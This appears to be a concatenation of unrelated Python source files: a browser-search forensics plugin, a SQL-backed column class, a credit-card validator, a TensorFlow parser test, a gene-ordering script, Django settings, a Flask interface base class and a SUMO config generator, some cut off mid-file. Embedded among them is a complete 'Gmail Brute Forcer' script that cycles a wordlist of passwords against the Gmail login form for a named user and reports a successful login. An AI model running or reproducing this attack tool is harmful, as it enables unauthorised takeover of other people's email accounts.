        return second.replace('+', ' ')
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
    """Analyze browser search entries from events."""

    NAME = 'browser_search'

    # Indicate that we do not want to run this plugin during regular extraction.
    ENABLE_IN_EXTRACTION = False

    # Here we define filters and callback methods for all hits on each filter.
    # Each entry is (filter expression, FilterClass method name).
    FILTERS = (
        (('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
         'GoogleSearch'),
        ('url contains "youtube.com"', 'YouTube'),
        (('source is "WEBHIST" and url contains "bing.com" and url contains '
          '"search"'), 'BingSearch'),
        ('url contains "mail.google.com"', 'Gmail'),
        (('source is "WEBHIST" and url contains "yandex.com" and url contains '
          '"yandsearch"'), 'Yandex'),
        ('url contains "duckduckgo.com"', 'DuckDuckGo')
    )

    def __init__(self, pre_obj, incoming_queue, outgoing_queue):
        """Constructor for the browser history plugin."""
        super(AnalyzeBrowserSearchPlugin, self).__init__(
            pre_obj, incoming_queue, outgoing_queue)
        # Maps a compiled filter object to (callback name, callback callable).
        self._filter_dict = {}
        # Counts occurrences keyed as u'<callback name>:<search term>'.
        self._counter = collections.Counter()
        for filter_str, call_back in self.FILTERS:
            filter_obj = filters.GetFilter(filter_str)
            call_back_obj = getattr(FilterClass, call_back, None)
            # Entries whose filter or callback cannot be resolved are
            # silently skipped.
            if filter_obj and call_back_obj:
                self._filter_dict[filter_obj] = (call_back, call_back_obj)

    def ExamineEvent(self, event_object):
        """Take an EventObject and send it through analysis."""
        # This event requires an URL attribute.
        url_attribute = getattr(event_object, 'url', None)
        if not url_attribute:
            return
        # Check if we are dealing with a web history event.
        source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
        if source != 'WEBHIST':
            return
        for filter_obj, call_backs in self._filter_dict.items():
            call_back_name, call_back_object = call_backs
            if filter_obj.Match(event_object):
                returned_line = ScrubLine(call_back_object(url_attribute))
                # Callbacks return None/'' when the URL is not a search.
                if not returned_line:
                    continue
                self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1

    def CompileReport(self):
        """Compiles a report of the analysis.

        Returns:
          The analysis report (instance of AnalysisReport).
        """
        report = event.AnalysisReport()
        results = {}
        # Re-group the flat counter into {engine: {term: count}}.
        for key, count in self._counter.iteritems():
            search_engine, _, search_term = key.partition(':')
            results.setdefault(search_engine, {})
            results[search_engine][search_term] = count
        report.report_dict = results
        lines_of_text = []
        for search_engine, terms in sorted(results.items()):
            lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
            # Sort by count (descending), then term, so the most frequent
            # searches are listed first.
            for search_term, count in sorted(
                    terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
                lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
        # An empty string is added to have SetText create an empty line.
        lines_of_text.append(u'')
        report.SetText(lines_of_text)
        return report
|
sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
    """
    Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).

    :return: The unique values.
    :rtype: np.array
    """
    # Let the database deduplicate; we only materialize the result.
    cursor = self.parent_table.conn.cursor()
    cursor.execute("select distinct {} from {}".format(self, self.parent_table))
    rows = cursor.fetchall()
    return np.array([row[0] for row in rows])
def hist(self, **kwargs):
    """Convenience alias: delegates all keyword arguments to ``self.plot.hist``."""
    return self.plot.hist(**kwargs)
def head(self, num_rows=10):
    """
    Fetches some values of this column.

    :param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
    :return: A NumPy array of the values
    :rtype: np.array
    :raises ValueError: If ``num_rows`` is neither a positive integer nor ``"all"``.
    """
    # BUGFIX: the old check `(isinstance(num_rows, int) and num_rows < 0)
    # or num_rows != "all"` rejected *every* integer (any int differs from
    # "all"), so head() always raised for int input. Accept positive ints
    # or the string "all", reject everything else.
    if not (num_rows == "all" or
            (isinstance(num_rows, int) and num_rows > 0)):
        raise ValueError("num_rows must be a positive integer or the string 'all'")
    query = self.select_all_query()
    if num_rows != "all":
        query += " limit {}".format(num_rows)
    cur = self.parent_table.conn.cursor()
    cur.execute(query)
    return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
    """
    Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).

    :return: Whether or not this column contains unique values.
    :rtype: bool
    """
    cur = self.parent_table.conn.cursor()
    # Any row this query returns is a value occurring more than once, so
    # an empty result set means every value is unique.
    cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
    return cur.fetchone() is None
@LazyProperty
def dtype(self):
    """
    The ``dtype`` of this column (represented as a string).

    :return: The ``dtype``.
    :rtype: str
    """
    # Looked up from the parent table's column-type mapping.
    return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
    """Render the SQL used by :meth:`describe`.

    :param None|list[float] percentiles: Percentiles (0-1) to include; None means quartiles.
    :param str type_: Either "continuous" or "discrete" percentile semantics.
    :return: The rendered SQL string, or None for non-numeric columns.
    :raises ValueError: On an invalid ``type_`` or out-of-range percentiles.
    """
    if type_.lower() not in ["continuous", "discrete"]:
        raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
    if not self.is_numeric:
        return None
    if percentiles is None:
        percentiles = [0.25, 0.5, 0.75]
    elif not bool(percentiles):
        # Any falsy value (e.g. [] or 0) means "no percentiles at all".
        percentiles = []
    if not isinstance(percentiles, (list, tuple)):
        # Allow a bare number for a single percentile.
        percentiles = [percentiles]
    if any([x < 0 or x > 1 for x in percentiles]):
        raise ValueError(
            "The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
                percentiles))
    # Round to two decimals, drop zero, and sort so the generated
    # percentile columns have a deterministic order.
    percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
    suffix = "cont" if type_.lower() == "continuous" else "desc"
    query = _describe_template.render(column=self, percentiles=percentiles,
                                      suffix=suffix, table=self.parent_table)
    if self.parent_table.debug:
        _pretty_print(query)
    return query
def describe(self, percentiles=None, type_="continuous"):
    """
    This mocks the method `pandas.Series.describe`, and provides
    a series with the same data (just calculated by the database).

    :param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
    :param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
    :return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
    :rtype: pandas.Series
    """
    # BUGFIX: normalize percentiles exactly the way _get_describe_query
    # does (wrap scalars, round, drop <= 0, sort) so the index labels line
    # up with the percentile columns the query actually returns. The old
    # code used the raw argument, mislabeling rows for unsorted input and
    # crashing on a bare number.
    if percentiles is None:
        percentiles = [0.25, 0.5, 0.75]
    elif not bool(percentiles):
        percentiles = []
    if not isinstance(percentiles, (list, tuple)):
        percentiles = [percentiles]
    percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
    cur = self.parent_table.conn.cursor()
    cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
    index = ["count", "mean", "std_dev", "minimum"] + \
        ["{}%".format(int(100 * p)) for p in percentiles] + \
        ["maximum"]
    return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
    """
    Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_ on ``distplot`` for more information.

    Note that this requires Seaborn in order to function.

    :param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
    :param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
    """
    import seaborn
    # bin_counts.counts returns (left_edge, right_edge, count) triples;
    # expand them back into one synthetic data point per counted row.
    bc = bin_counts.counts(self, bins=bins)
    n = sum([entry[2] for entry in bc])
    left = np.zeros(n)
    right = np.zeros(n)
    overall_index = 0
    for entry in bc:
        for i in range(entry[2]):
            left[overall_index] = entry[0]
            right[overall_index] = entry[1]
            overall_index += 1
    # We'll take our overall data points to be in the midpoint
    # of each binning interval
    # TODO: make this more configurable (left, right, etc)
    return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
    """
    Mocks the method `pandas.Series.values`, returning a simple NumPy array
    consisting of the values of this column.

    :return: The NumPy array containing the values.
    :rtype: np.array
    """
    cursor = self.parent_table.conn.cursor()
    cursor.execute(self.select_all_query())
    rows = cursor.fetchall()
    return np.array([row[0] for row in rows])
def _calculate_aggregate(self, aggregate):
    """Apply the SQL aggregate *aggregate* to this column and return the scalar result."""
    sql = "select {}({}) from (\n{}\n)a".format(
        aggregate, self, self.select_all_query())
    cursor = self.parent_table.conn.cursor()
    cursor.execute(sql)
    return cursor.fetchone()[0]
@LazyProperty
def mean(self):
    """
    Mocks the ``pandas.Series.mean`` method to give the mean of the values in this column.

    :return: The mean.
    :rtype: float
    """
    # Computed in the database via SQL avg(), not in Python.
    return self._calculate_aggregate("avg")
@LazyProperty
def max(self):
    """
    Mocks the ``pandas.Series.max`` method to give the maximum of the values in this column.

    :return: The maximum.
    :rtype: float
    """
    # Computed in the database via SQL max(), not in Python.
    return self._calculate_aggregate("max")
@LazyProperty
def min(self):
    """
    Mocks the ``pandas.Series.min`` method to give the minimum of the values in this column.

    :return: The minimum.
    :rtype: float
    """
    # Computed in the database via SQL min(), not in Python.
    return self._calculate_aggregate("min")
@LazyProperty
def size(self):
"""
Mocks the ``pandas.Series.size`` property to give a count of the values in this column.
:return: The count.
:rtype: int
"""
return self.parent_table |
import re
from calendar import monthrange
import datetime
class Card(object):
    """
    A credit card that may be valid or invalid.
    """
    # A regexp for matching non-digit values
    non_digit_regexp = re.compile(r'\D')

    # A mapping from common credit card brands to their number regexps
    BRAND_VISA = 'visa'
    BRAND_MASTERCARD = 'mastercard'
    BRAND_AMEX = 'amex'
    BRAND_DISCOVER = 'discover'
    BRAND_DANKORT = 'dankort'
    BRAND_MAESTRO = 'maestro'
    BRAND_DINERS = 'diners'
    BRAND_UNKNOWN = u'unknown'
    BRANDS = {
        BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
        BRAND_MASTERCARD: re.compile(r'''
            ^(5[1-5]\d{4}|677189)\d{10}$|      # Traditional 5-series + RU support
            ^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$  # 2016 2-series
        ''', re.VERBOSE),
        BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
        BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
        BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
        BRAND_MAESTRO:
            re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
        BRAND_DINERS:
            re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
    }

    # Human-friendly names for the known brands.
    FRIENDLY_BRANDS = {
        BRAND_VISA: 'Visa',
        BRAND_MASTERCARD: 'MasterCard',
        BRAND_AMEX: 'American Express',
        BRAND_DISCOVER: 'Discover',
        BRAND_DANKORT: 'Dankort',
        BRAND_MAESTRO: 'Maestro',
        BRAND_DINERS: 'Diners Club',
    }

    # Common test credit cards
    TESTS = (
        '4444333322221111',
        '378282246310005',
        '371449635398431',
        '378734493671000',
        '30569309025904',
        '38520000023237',
        '6011111111111117',
        '6011000990139424',
        # BUGFIX: was '555555555554444' (15 digits, fails Luhn); the
        # standard MasterCard test number has 16 digits.
        '5555555555554444',
        '5105105105105100',
        '4111111111111111',
        '4012888888881881',
        '4222222222222',
    )
    # Stripe test credit cards
    TESTS += (
        '4242424242424242',
    )

    def __init__(self, number, month, year, cvc, holder=None):
        """
        Attaches the provided card data and holder to the card after removing
        non-digits from the provided number.
        """
        self.number = self.non_digit_regexp.sub('', number)
        self.exp_date = ExpDate(month, year)
        self.cvc = cvc
        self.holder = holder

    def __repr__(self):
        """
        Returns a typical repr with a simple representation of the masked card
        number and the exp date.
        """
        return u'<Card brand={b} number={n}, exp_date={e}>'.format(
            b=self.brand,
            n=self.mask,
            e=self.exp_date.mmyyyy
        )

    @property
    def mask(self):
        """
        Returns the credit card number with each of the number's digits but the
        first six and the last four digits replaced by an X, formatted the way
        they appear on their respective brands' cards.
        """
        # If the card is invalid, return an "invalid" message
        if not self.is_mod10_valid:
            return u'invalid'
        # If the card is an Amex, it will have special formatting
        if self.brand == self.BRAND_AMEX:
            return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
        # All other cards
        return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])

    @property
    def brand(self):
        """
        Returns the brand of the card, if applicable, else an "unknown" brand.
        """
        # Check if the card is of known type
        for brand, regexp in self.BRANDS.items():
            if regexp.match(self.number):
                return brand
        # Default to unknown brand
        return self.BRAND_UNKNOWN

    @property
    def friendly_brand(self):
        """
        Returns the human-friendly brand name of the card.
        """
        return self.FRIENDLY_BRANDS.get(self.brand, 'unknown')

    @property
    def is_test(self):
        """
        Returns whether or not the card's number is a known test number.
        """
        return self.number in self.TESTS

    @property
    def is_expired(self):
        """
        Returns whether or not the card is expired.
        """
        return self.exp_date.is_expired

    @property
    def is_valid(self):
        """
        Returns whether or not the card is a valid card for making payments.
        """
        return not self.is_expired and self.is_mod10_valid

    @property
    def is_mod10_valid(self):
        """
        Returns whether or not the card's number validates against the mod10
        algorithm (Luhn algorithm), automatically returning False on an empty
        value.
        """
        # Check for empty string
        if not self.number:
            return False
        # Run mod10 on the number: walking right to left, every second
        # digit is doubled and its digit sum accumulated.
        dub, tot = 0, 0
        for i in range(len(self.number) - 1, -1, -1):
            for c in str((dub + 1) * int(self.number[i])):
                tot += int(c)
            dub = (dub + 1) % 2
        return (tot % 10) == 0
class ExpDate(object):
    """A credit card expiration date.

    Wraps a (month, year) pair and exposes the final instant of that
    month plus several strftime-style renderings of it.
    """
    def __init__(self, month, year):
        """Store month/year and precompute the last moment of the month."""
        self.month = month
        self.year = year
        # monthrange -> (weekday of the 1st, number of days in the month);
        # only the day count matters here.
        _, last_day = monthrange(year, month)
        # The card stays valid through the last microsecond of its month.
        self.expired_after = datetime.datetime(
            year, month, last_day, 23, 59, 59, 999999
        )
    def __repr__(self):
        """Repr showing the MM/YYYY the card is valid through."""
        return u'<ExpDate expired_after={d}>'.format(
            d=self.expired_after.strftime('%m/%Y')
        )
    @property
    def is_expired(self):
        """Whether the date has passed everywhere on Earth.

        Measured at UTC-11 (American Samoa, the last timezone), so a card
        is only reported expired once its month has ended globally.
        """
        samoa_now = datetime.datetime.utcnow() - datetime.timedelta(hours=11)
        return samoa_now > self.expired_after
    @property
    def mmyyyy(self):
        """The expiration date in MM/YYYY format."""
        return self.expired_after.strftime('%m/%Y')
    @property
    def mmyy(self):
        """The expiration date in MM/YY format, as printed on cards."""
        return self.expired_after.strftime('%m/%y')
    @property
    def MMYY(self):
        """The expiration date in MMYY format (no separator)."""
        return self.expired_after.strftime('%m%y')
    @property
    def mm(self):
        """The two-digit expiration month."""
        return self.expired_after.strftime('%m')
    @property
    def yyyy(self):
        """The four-digit expiration year."""
        return self.expired_after.strftime('%Y')
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicab | le law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======== | ======================================================================
"""Tests for parser module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import textwrap
from tensorflow.contrib.autograph.pyct import parser
from tensorflow.python.platform import test
class ParserTest(test.TestCase):
  """Checks that the autograph parser produces the expected AST roots."""

  def test_parse_entity(self):
    def f(x):
      return x + 1
    module_node, _ = parser.parse_entity(f)
    # parse_entity returns a module whose first statement is f's FunctionDef.
    self.assertEqual('f', module_node.body[0].name)

  def test_parse_str(self):
    module_node = parser.parse_str(
        textwrap.dedent("""
      def f(x):
        return x + 1
    """))
    self.assertEqual('f', module_node.body[0].name)

  def test_parse_expression(self):
    expr_node = parser.parse_expression('a.b')
    # 'a.b' parses to an Attribute node: value is the Name 'a', attr is 'b'.
    self.assertEqual('a', expr_node.value.id)
    self.assertEqual('b', expr_node.attr)


if __name__ == '__main__':
  test.main()
|
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
prin | t "Usage: ./gmailbrute.py <user> <wordlist>"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[ | +] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
|
#Aditya Joshi
#Enumerating Oriented Gene Ordering
from itertools import permutations,product
from math import fabs
# Read the permutation length n from stdin (Python 2 raw_input).
n = int(raw_input())
def make_set(n):
    """Return the list [1, 2, ..., n] (empty for n < 1)."""
    return list(range(1, n + 1))
def plusAndMinusPermutations(items):
    """Yield every permutation of `items` under every +/- sign assignment.

    For k items this produces k! * 2**k lists, covering all oriented
    gene orderings.
    """
    size = len(items)
    for perm in permutations(items, size):
        for signs in product([-1, 1], repeat=size):
            yield [value * sign for value, sign in zip(perm, signs)]
def array_to_string(list):
    """Return all elements of `list` joined by single spaces.

    Fixes the original implementation, which emitted only the first two
    elements -- truncating signed permutations of length > 2 and raising
    IndexError for single-element input.
    """
    return " ".join(str(item) for item in list)
count = 0
# Print every signed permutation of 1..n, one per line, then the total
# count (the Rosalind "Enumerating Oriented Gene Orderings" format).
for x in plusAndMinusPermutations(make_set(n)):
    print array_to_string(x)
    count += 1
print count
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# | Michael A.G. Aivazis
# California Institute of | Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from SI import meter, second
# The gal (Gal): CGS unit of acceleration, 1 cm/s^2 = 0.01 m/s^2,
# expressed via the SI base units imported above.
gal = 0.01*meter/second**2
# version
__id__ = "$Id: force.py,v 1.1.1.1 2005/03/08 16:13:41 aivazis Exp $"
#
# End of file
|
from .base import *
import dj_database_url
# DEBUG is on unless the environment sets exactly DEBUG=False; any other
# value (including unset) leaves it enabled.
# NOTE(review): defaulting DEBUG to True in a deployment settings module
# is risky -- confirm this is intentional.
if os.environ.get('DEBUG') == 'False':
    DEBUG = False
else:
    DEBUG = True
# Optional machine-local overrides; silently skipped when absent.
try:
    from .local import *
except ImportError:
    pass
# Accept any Host header.
ALLOWED_HOSTS = ['*']
# Database configuration is read from the DATABASE_URL environment variable.
DATABASES = {'default': dj_database_url.config()}
# Yammer OAuth credentials (None when the variables are unset).
SOCIAL_AUTH_YAMMER_KEY = os.environ.get('SOCIAL_AUTH_YAMMER_KEY')
SOCIAL_AUTH_YAMMER_SECRET = os.environ.get('SOCIAL_AUTH_YAMMER_SECRET')
# Static assets live on S3; direct indexing makes a missing bucket name
# fail fast at import time.
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
STATICFILES_STORAGE = 'core.storage.S3PipelineManifestStorage'
STATIC_URL = 'http://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME
AWS_QUERYSTRING_AUTH = False
AWS_S3_FILE_OVERWRITE = True
# django-pipeline asset compression via yuglify (Heroku buildpack path).
PIPELINE_JS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_CSS_COMPRESSOR = 'pipeline.compressors.yuglify.YuglifyCompressor'
PIPELINE_YUGLIFY_BINARY = '/app/.heroku/python/bin/yuglify'
import datetime
import logging
from functools import reduce
from flask_babelpkg import lazy_gettext
from .filters import Filters
log = logging.getLogger(__name__)
class BaseInterface(object):
    """
    Base class for all data model interfaces.
    Sub class it to implement your own interface for some data engine.
    """
    obj = None
    filter_converter_class = None
    """ when sub classing override with your own custom filter converter """
    """ Messages to display on CRUD Events """
    add_row_message = lazy_gettext('Added Row')
    edit_row_message = lazy_gettext('Changed Row')
    delete_row_message = lazy_gettext('Deleted Row')
    delete_integrity_error_message = lazy_gettext('Associated data exists, please delete them first')
    add_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
    edit_integrity_error_message = lazy_gettext('Integrity error, probably unique constraint')
    general_error_message = lazy_gettext('General Error')
    """ Tuple with message and text with severity type ex: ("Added Row", "info") """
    message = ()
    def __init__(self, obj):
        # `obj` is the data model this interface wraps.
        self.obj = obj
    def _get_attr_value(self, item, col):
        """Resolve `col` on `item`: dotted inner path, callable, or attribute."""
        if not hasattr(item, col):
            # it's an inner obj attr: walk a dotted path like "parent.name"
            return reduce(getattr, col.split('.'), item)
        if hasattr(getattr(item, col), '__call__'):
            # its a function: call it and return the result
            return getattr(item, col)()
        else:
            # its attribute
            return getattr(item, col)
    def get_filters(self, search_columns=None):
        """Build a Filters collection for the given searchable columns."""
        search_columns = search_columns or []
        return Filters(self.filter_converter_class, self, search_columns)
    def get_values_item(self, item, show_columns):
        """Return the values of `show_columns` for one item, in column order."""
        return [self._get_attr_value(item, col) for col in show_columns]
    def _get_values(self, lst, list_columns):
        """
        Get Values: formats values for list template.
        returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
        :param lst:
            The list of item objects from query
        :param list_columns:
            The list of columns to include
        """
        # NOTE(review): eager counterpart of get_values() below; the two
        # bodies are otherwise identical.
        retlst = []
        for item in lst:
            retdict = {}
            for col in list_columns:
                retdict[col] = self._get_attr_value(item, col)
            retlst.append(retdict)
        return retlst
    def get_values(self, lst, list_columns):
        """
        Get Values: formats values for list template.
        returns [{'col_name':'col_value',....},{'col_name':'col_value',....}]
        :param lst:
            The list of item objects from query
        :param list_columns:
            The list of columns to include
        """
        # Lazy (generator) variant of _get_values().
        for item in lst:
            retdict = {}
            for col in list_columns:
                retdict[col] = self._get_attr_value(item, col)
            yield retdict
    def get_values_json(self, lst, list_columns):
        """
        Converts list of objects from query to JSON
        """
        result = []
        for item in self.get_values(lst, list_columns):
            for key, value in list(item.items()):
                # Dates are not JSON serializable; render them as ISO 8601.
                if isinstance(value, datetime.datetime) or isinstance(value, datetime.date):
                    value = value.isoformat()
                    item[key] = value
                if isinstance(value, list):
                    item[key] = [str(v) for v in value]
            result.append(item)
        return result
    """
    Returns the models class name
    useful for auto title on views
    """
    @property
    def model_name(self):
        return self.obj.__class__.__name__
    """
    Next methods must be overridden
    """
    def query(self, filters=None, order_column='', order_direction='',
              page=None, page_size=None):
        pass
    # Type/relationship introspection predicates: concrete interfaces
    # override the ones their engine can answer; the defaults are False.
    def is_image(self, col_name):
        return False
    def is_file(self, col_name):
        return False
    def is_gridfs_file(self, col_name):
        return False
    def is_gridfs_image(self, col_name):
        return False
    def is_string(self, col_name):
        return False
    def is_text(self, col_name):
        return False
    def is_integer(self, col_name):
        return False
    def is_float(self, col_name):
        return False
    def is_boolean(self, col_name):
        return False
    def is_date(self, col_name):
        return False
    def is_datetime(self, col_name):
        return False
    def is_relation(self, prop):
        return False
    def is_relation_col(self, col):
        return False
    def is_relation_many_to_one(self, prop):
        return False
    def is_relation_many_to_many(self, prop):
        return False
    def is_relation_one_to_one(self, prop):
        return False
    def is_relation_one_to_many(self, prop):
        return False
    def is_nullable(self, col_name):
        # Columns are assumed nullable unless an interface knows better.
        return True
    def is_unique(self, col_name):
        return False
    def is_pk(self, col_name):
        return False
    def is_fk(self, col_name):
        return False
    def get_max_length(self, col_name):
        # -1 means "no length constraint known".
        return -1
    def get_min_length(self, col_name):
        return -1
    """
    -----------------------------------------
         FUNCTIONS FOR CRUD OPERATIONS
    -----------------------------------------
    """
    def add(self, item):
        """
        Adds object
        """
        raise NotImplementedError
    def edit(self, item):
        """
        Edit (change) object
        """
        raise NotImplementedError
    def delete(self, item):
        """
        Deletes object
        """
        raise NotImplementedError
    def get_col_default(self, col_name):
        pass
    def get_keys(self, lst):
        """
        return a list of pk values from object list
        """
        # NOTE(review): calls get_pk_name() without arguments although the
        # method below declares a required `item` parameter -- one of the
        # two signatures looks wrong; confirm against concrete interfaces.
        pk_name = self.get_pk_name()
        return [getattr(item, pk_name) for item in lst]
    def get_pk_name(self, item):
        """
        Returns the primary key name
        """
        raise NotImplementedError
    def get_pk_value(self, item):
        # NOTE(review): likewise calls get_pk_name() without `item`.
        return getattr(item, self.get_pk_name())
    def get(self, pk):
        """
        return the record from key
        """
        pass
    def get_related_model(self, prop):
        raise NotImplementedError
    def get_related_interface(self, col_name):
        """
        Returns a BaseInterface for the related model
        of column name.
        :param col_name: Column name with relation
        :return: BaseInterface
        """
        raise NotImplementedError
    def get_related_obj(self, col_name, value):
        raise NotImplementedError
    def get_related_fk(self, model):
        raise NotImplementedError
    def get_columns_list(self):
        """
        Returns a list of all the columns names
        """
        return []
    def get_user_columns_list(self):
        """
        Returns a list of user viewable columns names
        """
        return self.get_columns_list()
    def get_search_columns_list(self):
        """
        Returns a list of searchable columns names
        """
        return []
    def get_order_columns_list(self, list_columns=None):
        """
        Returns a list of order columns names
        """
        return []
    def get_relation_fk(self, prop):
        pass
|
"""
@file sumoConfigGen.py
@author Craig Rafter
@date 29/01/2016
Code to generate a config file for a SUMO model.
"""
def sumoConfigGen(modelname='simpleT', configFile='./models/simpleT.sumocfg',
                  exportPath='../', AVratio=0, stepSize=0.01,
                  run=0, port=8813):
    """Write a SUMO .sumocfg configuration file for the given model.

    :param modelname: base name of the SUMO network/route files
    :param configFile: path the generated .sumocfg is written to
    :param exportPath: directory prefix used in the (commented-out) outputs
    :param AVratio: autonomous-vehicle ratio, encoded into output file names
    :param stepSize: simulation step length in seconds
    :param run: run index, encoded into output file names
    :param port: TraCI server port SUMO will listen on

    Fixes the original implementation, which used the Python 2-only
    ``print >> fileobj`` syntax and did not guarantee the file handle was
    closed on error; the bytes written are identical.
    """
    body = """<configuration>
    <input>
        <net-file value="{model}.net.xml"/>
        <route-files value="{model}.rou.xml"/>
        <gui-settings-file value="gui-settings.cfg"/>
        <game value="1"/>
        <start value="1"/>
        <!--additional-files value="{model}.det.xml"/-->
    </input>
    <output>
        <!--<summary-output value="{expPath}summary{AVR:03d}_{Nrun:03d}.xml"/>-->
        <!--tripinfo-output value="{expPath}tripinfo{AVR:03d}_{Nrun:03d}.xml"/-->
        <!--<vehroute-output value="{expPath}vehroute{AVR:03d}_{Nrun:03d}.xml"/-->
        <!--queue-output value="{expPath}queuedata{AVR:03d}_{Nrun:03d}.xml"/-->
    </output>
    <time>
        <begin value="0"/>
        <step-length value="{stepSz}"/>
    </time>
    <processing>
        <!--TURN OFF TELEPORTING-->
